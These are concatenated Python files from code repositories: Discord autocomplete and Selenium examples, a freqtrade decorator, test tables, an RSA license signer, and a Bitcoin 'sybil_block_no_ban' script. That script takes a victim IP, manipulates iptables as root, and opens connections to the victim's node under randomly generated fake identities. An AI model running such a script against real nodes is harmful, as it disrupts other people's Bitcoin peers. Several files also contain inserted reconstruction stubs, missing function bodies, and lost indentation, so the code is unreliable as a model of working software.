max_stars_repo: examples/app_commands/slash_autocomplete.py @ Mihitoko/pycord (137c1474eed5fb4273e542bd22ad76764a8712fc) | licenses: ["MIT"] | stars: null
max_issues_repo: examples/app_commands/slash_autocomplete.py @ Mihitoko/pycord (137c1474eed5fb4273e542bd22ad76764a8712fc) | licenses: ["MIT"] | issues: null
max_forks_repo: examples/app_commands/slash_autocomplete.py @ Mihitoko/pycord (137c1474eed5fb4273e542bd22ad76764a8712fc) | licenses: ["MIT"] | forks: 1 (2022-02-20T09:10:40.000Z to 2022-02-20T09:10:40.000Z)
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
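# The example commands were stripped from this dump; two representative
# autocomplete slash commands in Pycord style (the names are illustrative):
async def color_searcher(ctx: discord.AutocompleteContext):
    """Return colors from the long list that match what was typed so far."""
    return [color for color in LOTS_OF_COLORS if ctx.value.lower() in color]


@bot.slash_command(name="color")
@option("color", description="Pick a color!",
        autocomplete=discord.utils.basic_autocomplete(COLORS))
async def get_color(ctx: discord.ApplicationContext, color: str):
    await ctx.respond(f"You picked {color}!")


@bot.slash_command(name="colors")
@option("color", description="Pick a color from the big list!",
        autocomplete=color_searcher)
async def get_color_from_long_list(ctx: discord.ApplicationContext, color: str):
    await ctx.respond(f"You picked {color}!")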
bot.run("TOKEN")
avg_line_length: 27.079365 | max_line_length: 112 | alphanum_fraction: 0.657679

hexsha: 4c5bad7796ac5e7201e5d6fb5312abee3b503a5c | size: 11,522 | ext: py | lang: Python
max_stars_repo: tools/Networking/sybil_block_no_ban.py @ simewu/bitcoin_researcher (b9fd2efdb8ae8467c5bd4b3320713a541635df16) | licenses: ["MIT"] | stars: 1 (2020-02-15T21:44:04.000Z to 2020-02-15T21:44:04.000Z)
max_issues_repo: tools/Networking/sybil_block_no_ban.py @ SimeoW/bitcoin (3644405f06c8b16a437513e8c02f0f061b91be2e) | licenses: ["MIT"] | issues: null
max_forks_repo: tools/Networking/sybil_block_no_ban.py @ SimeoW/bitcoin (3644405f06c8b16a437513e8c02f0f061b91be2e) | licenses: ["MIT"] | forks: null
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
    sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
# Send commands to the Bitcoin Core Console
# Generate a random identity using the broadcast address template
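# The helper bodies were stripped from this dump; minimal stand-ins for two
# of the many helpers used by __main__ below (the broadcast-template subnet
# logic is replaced by a generic random address — an assumption):
def terminal(cmd):
    return os.popen(cmd).read()

def random_ip():
    return '.'.join(str(random.randint(1, 254)) for _ in range(4))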
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
# Construct a block packet using python-bitcoinlib
# Construct a version packet using python-bitcoinlib
# Close a connection
# Creates a fake connection to the victim
# Send version repeatedly, until banned
# Initialize the network
# Initialize Bitcoin info
# Save a backyp of the iptable rules
# Restore the backup of the iptable rules
# Remove all ip aliases that were created by the script
# This function is ran when the script is stopped
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
	cleanup_iptables() # Restore any pre-existing iptables before backing up, in case the computer shut down without restoring them
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006 | 359 | 0.743881 |
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
| 1,638 |
py
|
Python
|
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
#!python3
'''
author: justZero
email: [email protected]
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
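# Hedged reconstruction (assumption): the MySQLdb wrapper class was missing
# from this snippet; the minimal sketch below matches how it is used in
# __main__. Connection parameters and the table name are placeholders.
class MySQLdb(object):

    def __init__(self):
        self.conn = pymysql.connect(host='localhost',
                                    user='root',
                                    password='root',
                                    db='douban_movie',
                                    charset='utf8mb4',
                                    cursorclass=pymysql.cursors.DictCursor)

    def insert_movie(self, movies):
        # Bulk-insert rows; the placeholder count is derived from the data.
        placeholders = ','.join(['%s'] * len(movies[0]))
        sql = 'INSERT INTO movie VALUES ({})'.format(placeholders)
        with self.conn.cursor() as cursor:
            cursor.executemany(sql, movies)
        self.conn.commit()

    def close(self):
        self.conn.close()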
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
    except Exception:
        raise
finally:
db.close()
| 25.2 | 156 | 0.566545 |
4c5d1777ffd1452788619a58c2a3c09a88985225
| 2,077 |
py
|
Python
|
examples/rxff-serial/run.py
|
sctiwari/EZFF_ASE
|
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
|
[
"MIT"
] | 3 |
2019-01-22T21:22:09.000Z
|
2019-04-02T22:50:40.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 14 |
2019-01-14T18:33:15.000Z
|
2019-07-08T22:10:11.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 3 |
2019-03-24T23:43:13.000Z
|
2021-09-12T13:45:08.000Z
|
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
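# Hedged sketch (assumption): the error function was missing from this snippet.
# EZFF calls it with a dictionary of sampled variable values and expects a list
# of error values (num_errors = 1 below). A real implementation would write the
# substituted forcefield, run GULP over the ground-truth geometries, and return
# the deviation from the QChem energies read above; the placeholder body here
# only keeps the example runnable.
def my_error_function(rr):
    # Placeholder error: distance of the sampled variables from 1.0.
    return [sum((value - 1.0) ** 2 for value in rr.values())]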
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 37.763636 | 124 | 0.735676 |
4c5db4db71b2cfe512dcdca6c87e641cb929544e
| 2,288 |
py
|
Python
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | 1 |
2022-01-29T17:14:40.000Z
|
2022-01-29T17:14:40.000Z
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 27.566265 | 89 | 0.542832 |
4c5e8dbae6d19592874e45bede3206b69cd9c042
| 594 |
py
|
Python
|
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
genlicense.py
|
d53dave/python-crypto-licensecheck
|
d11612612ea54a5418fd8dbba9212a9c84c56f22
|
[
"CNRI-Python",
"RSA-MD"
] | null | null | null |
import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
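def sign_data(key_file, data, out_file):
    # Hedged reconstruction (assumption): this function was missing from the
    # snippet. The body follows the standard pycryptodome pattern: sign `data`
    # with the RSA private key in `key_file` using PKCS#1 v1.5 over a SHA-256
    # digest, writing the raw signature to `out_file`.
    with open(key_file, 'rb') as f:
        key = RSA.import_key(f.read())
    digest = SHA256.new(data.encode('utf-8'))
    signature = pkcs1_15.new(key).sign(digest)
    with open(out_file, 'wb') as f:
        f.write(signature)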
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| 28.285714 | 53 | 0.66835 |
4c5f21108bc3014442b8b88f1279054fc89706f5
| 5,302 |
py
|
Python
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1 |
2022-03-06T22:44:30.000Z
|
2022-03-06T22:44:30.000Z
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | null | null | null |
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1 |
2021-09-22T23:28:21.000Z
|
2021-09-22T23:28:21.000Z
|
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
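# Hedged reconstruction (assumption): this container was missing from the
# snippet; it stores one @informative request per decorated method.
class InformativeData(NamedTuple):
    asset: Optional[str]
    timeframe: str
    fmt: Union[str, Callable[[Any], str], None]
    ffill: bool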
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
    :param timeframe: Informative timeframe. Must always be equal to or higher than the
        strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
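    # Hedged reconstruction (assumption): the inner decorator was missing from
    # this snippet. It records the request on the decorated method so the
    # framework can fetch and merge the informative pair later.
    def decorator(fn: PopulateIndicators) -> PopulateIndicators:
        informative_pairs = getattr(fn, '_ft_informative', [])
        informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
        setattr(fn, '_ft_informative', informative_pairs)
        return fn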
return decorator
| 41.100775 | 100 | 0.656733 |
4c60db4ddf2f272ea38921358d511b5e55303545
| 835 |
py
|
Python
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 234 |
2020-04-03T02:59:30.000Z
|
2022-03-27T15:29:21.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 8 |
2020-04-20T11:20:43.000Z
|
2021-08-18T16:41:15.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 77 |
2020-04-03T13:25:19.000Z
|
2022-02-24T15:31:26.000Z
|
from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
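# Hedged reconstruction (assumption): esperar_elemento was missing from this
# snippet. WebDriverWait calls it with the driver, so the partials below bind
# the CSS selector as the first argument.
def esperar_elemento(elemento, webdriver):
    # Return True once at least one element matches the CSS selector.
    return bool(webdriver.find_elements_by_css_selector(elemento))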
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
    'A mensagem de sucesso não apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'
| 21.973684 | 58 | 0.762874 |
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
| 1,470 |
py
|
Python
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 24 |
2020-06-30T11:43:38.000Z
|
2021-11-15T22:58:47.000Z
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | null | null | null |
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 4 |
2020-10-15T10:54:18.000Z
|
2021-05-25T07:38:14.000Z
|
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
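# Hedged reconstruction (assumption): the loss module itself was missing from
# this snippet. The imports above suggest a distance-based loss; the sketch
# below shows the likely shape. The class name, hinge argument, and call
# signatures of the imported distances are assumptions.
class DistanceLoss(nn.Module):

    def __init__(self, hinge=1.0):
        super().__init__()
        # Constructor signature of HingedSquaredEuclidean is an assumption.
        self.distance = HingedSquaredEuclidean(hinge)

    def forward(self, z, z_positive, z_negative):
        # Attract positives with the plain squared distance and repel
        # negatives with the hinged variant.
        positive = square_dist(z, z_positive).mean()
        negative = self.distance(z, z_negative).mean()
        return positive + negative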
| 24.098361 | 86 | 0.586395 |